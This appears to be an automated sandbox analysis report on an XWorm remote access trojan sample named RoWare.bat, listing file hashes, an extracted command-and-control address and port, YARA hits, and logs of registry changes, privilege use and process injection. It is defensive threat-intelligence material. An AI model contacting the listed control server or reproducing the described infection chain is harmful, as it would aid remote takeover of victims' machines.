xworm | 5baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde

Analysis

max time kernel
120s
max time network
113s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
08-06-2024 22:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RoWare.bat
Size

399KB
MD5

472de93de365167459958b7ce29f610e
SHA1

7a7ace619fbd8569c2982fb1fc44aa4b6040f351
SHA256

5baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde
SHA512

03fc1017200c386cbe36050f5014c644edd57864ba1f7b88e5ab497d616ba3ec658ee8d690efde5544fe3befe569f3365e4d64f3b276245967193527e3b17f6a
SSDEEP

6144:VvP2P1+j6+5esGiWZo9wvkjXD6P8NUd7XPDRwEMiF7i5qwJgK5EG/R7H4z:ZOtyEvi7dzNmdjl5F7g1ZK8VH2

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

91.92.250.4:2709

Attributes

install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1948-84-0x0000027A72060000-0x0000027A72074000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

1 1948 powershell.exe
3 1948 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

2704 powershell.exe
1948 powershell.exe
1632 powershell.exe
3608 powershell.exe
1868 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

ComputerDefaults.exe

pid process

4600 ComputerDefaults.exe
Loads dropped DLL 1 IoCs

Processes:

ComputerDefaults.exe

pid process

4600 ComputerDefaults.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2228 timeout.exe

flow	pid	process
1	1948	powershell.exe
3	1948	powershell.exe

pid	process
4600	ComputerDefaults.exe

pid	process
4600	ComputerDefaults.exe

pid	process
2228	timeout.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\TypedURLs	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE

Modifies data under HKEY_USERS 9 IoCs

Processes:

svchost.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	svchost.exe

Modifies registry class 64 IoCs

Processes:

Explorer.EXEsvchost.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe11000000789966c455a1da01ee2fc4c655a1da0112c240c955a1da0114000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000789966c455a1da012bfa128259a1da012bfa128259a1da0114000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Downloads"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ITT = "133623593317295991"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133596544566580523"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1	svchost.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Explorer.EXE

pid process

3176 Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2704	powershell.exe
2704	powershell.exe
1948	powershell.exe
1948	powershell.exe
1632	powershell.exe
1632	powershell.exe
3372	powershell.exe
3372	powershell.exe
3608	powershell.exe
3608	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1832	powershell.exe
1832	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1868	powershell.exe
1868	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
1948	powershell.exe
2704	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3176 Explorer.EXE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs

Processes:

svchost.exe

pid process

808 svchost.exe

pid	process
808	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	1632	powershell.exe
Token: SeDebugPrivilege	3372	powershell.exe
Token: SeIncreaseQuotaPrivilege	3372	powershell.exe
Token: SeSecurityPrivilege	3372	powershell.exe
Token: SeTakeOwnershipPrivilege	3372	powershell.exe
Token: SeLoadDriverPrivilege	3372	powershell.exe
Token: SeSystemProfilePrivilege	3372	powershell.exe
Token: SeSystemtimePrivilege	3372	powershell.exe
Token: SeProfSingleProcessPrivilege	3372	powershell.exe
Token: SeIncBasePriorityPrivilege	3372	powershell.exe
Token: SeCreatePagefilePrivilege	3372	powershell.exe
Token: SeBackupPrivilege	3372	powershell.exe
Token: SeRestorePrivilege	3372	powershell.exe
Token: SeShutdownPrivilege	3372	powershell.exe
Token: SeDebugPrivilege	3372	powershell.exe
Token: SeSystemEnvironmentPrivilege	3372	powershell.exe
Token: SeRemoteShutdownPrivilege	3372	powershell.exe
Token: SeUndockPrivilege	3372	powershell.exe
Token: SeManageVolumePrivilege	3372	powershell.exe
Token: 33	3372	powershell.exe
Token: 34	3372	powershell.exe
Token: 35	3372	powershell.exe
Token: 36	3372	powershell.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeIncreaseQuotaPrivilege	3608	powershell.exe
Token: SeSecurityPrivilege	3608	powershell.exe
Token: SeTakeOwnershipPrivilege	3608	powershell.exe
Token: SeLoadDriverPrivilege	3608	powershell.exe
Token: SeSystemProfilePrivilege	3608	powershell.exe
Token: SeSystemtimePrivilege	3608	powershell.exe
Token: SeProfSingleProcessPrivilege	3608	powershell.exe
Token: SeIncBasePriorityPrivilege	3608	powershell.exe
Token: SeCreatePagefilePrivilege	3608	powershell.exe
Token: SeBackupPrivilege	3608	powershell.exe
Token: SeRestorePrivilege	3608	powershell.exe
Token: SeShutdownPrivilege	3608	powershell.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeSystemEnvironmentPrivilege	3608	powershell.exe
Token: SeRemoteShutdownPrivilege	3608	powershell.exe
Token: SeUndockPrivilege	3608	powershell.exe
Token: SeManageVolumePrivilege	3608	powershell.exe
Token: 33	3608	powershell.exe
Token: 34	3608	powershell.exe
Token: 35	3608	powershell.exe
Token: 36	3608	powershell.exe
Token: SeIncreaseQuotaPrivilege	3608	powershell.exe
Token: SeSecurityPrivilege	3608	powershell.exe
Token: SeTakeOwnershipPrivilege	3608	powershell.exe
Token: SeLoadDriverPrivilege	3608	powershell.exe
Token: SeSystemProfilePrivilege	3608	powershell.exe
Token: SeSystemtimePrivilege	3608	powershell.exe
Token: SeProfSingleProcessPrivilege	3608	powershell.exe
Token: SeIncBasePriorityPrivilege	3608	powershell.exe
Token: SeCreatePagefilePrivilege	3608	powershell.exe
Token: SeBackupPrivilege	3608	powershell.exe
Token: SeRestorePrivilege	3608	powershell.exe
Token: SeShutdownPrivilege	3608	powershell.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeSystemEnvironmentPrivilege	3608	powershell.exe
Token: SeRemoteShutdownPrivilege	3608	powershell.exe
Token: SeUndockPrivilege	3608	powershell.exe
Token: SeManageVolumePrivilege	3608	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

Explorer.EXE

pid process

3176 Explorer.EXE
3176 Explorer.EXE
3176 Explorer.EXE

Suspicious use of SendNotifyMessage 57 IoCs

Processes:

Explorer.EXE

pid	process
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE
3176	Explorer.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

Explorer.EXE

pid process

3176 Explorer.EXE
3176 Explorer.EXE
3176 Explorer.EXE
3176 Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.execmd.exeComputerDefaults.execmd.exepowershell.exe

description	pid	process	target process
PID 2244 wrote to memory of 700	2244	cmd.exe	cmd.exe
PID 2244 wrote to memory of 700	2244	cmd.exe	cmd.exe
PID 2244 wrote to memory of 1352	2244	cmd.exe	cmd.exe
PID 2244 wrote to memory of 1352	2244	cmd.exe	cmd.exe
PID 2244 wrote to memory of 2704	2244	cmd.exe	powershell.exe
PID 2244 wrote to memory of 2704	2244	cmd.exe	powershell.exe
PID 2704 wrote to memory of 4004	2704	powershell.exe	cmd.exe
PID 2704 wrote to memory of 4004	2704	powershell.exe	cmd.exe
PID 4004 wrote to memory of 4600	4004	cmd.exe	ComputerDefaults.exe
PID 4004 wrote to memory of 4600	4004	cmd.exe	ComputerDefaults.exe
PID 4600 wrote to memory of 4256	4600	ComputerDefaults.exe	cmd.exe
PID 4600 wrote to memory of 4256	4600	ComputerDefaults.exe	cmd.exe
PID 4256 wrote to memory of 1868	4256	cmd.exe	cmd.exe
PID 4256 wrote to memory of 1868	4256	cmd.exe	cmd.exe
PID 4256 wrote to memory of 1812	4256	cmd.exe	cmd.exe
PID 4256 wrote to memory of 1812	4256	cmd.exe	cmd.exe
PID 4256 wrote to memory of 1948	4256	cmd.exe	powershell.exe
PID 4256 wrote to memory of 1948	4256	cmd.exe	powershell.exe
PID 1948 wrote to memory of 1632	1948	powershell.exe	powershell.exe
PID 1948 wrote to memory of 1632	1948	powershell.exe	powershell.exe
PID 1948 wrote to memory of 3372	1948	powershell.exe	powershell.exe
PID 1948 wrote to memory of 3372	1948	powershell.exe	powershell.exe
PID 1948 wrote to memory of 3608	1948	powershell.exe	powershell.exe
PID 1948 wrote to memory of 3608	1948	powershell.exe	powershell.exe
PID 1948 wrote to memory of 3176	1948	powershell.exe	Explorer.EXE
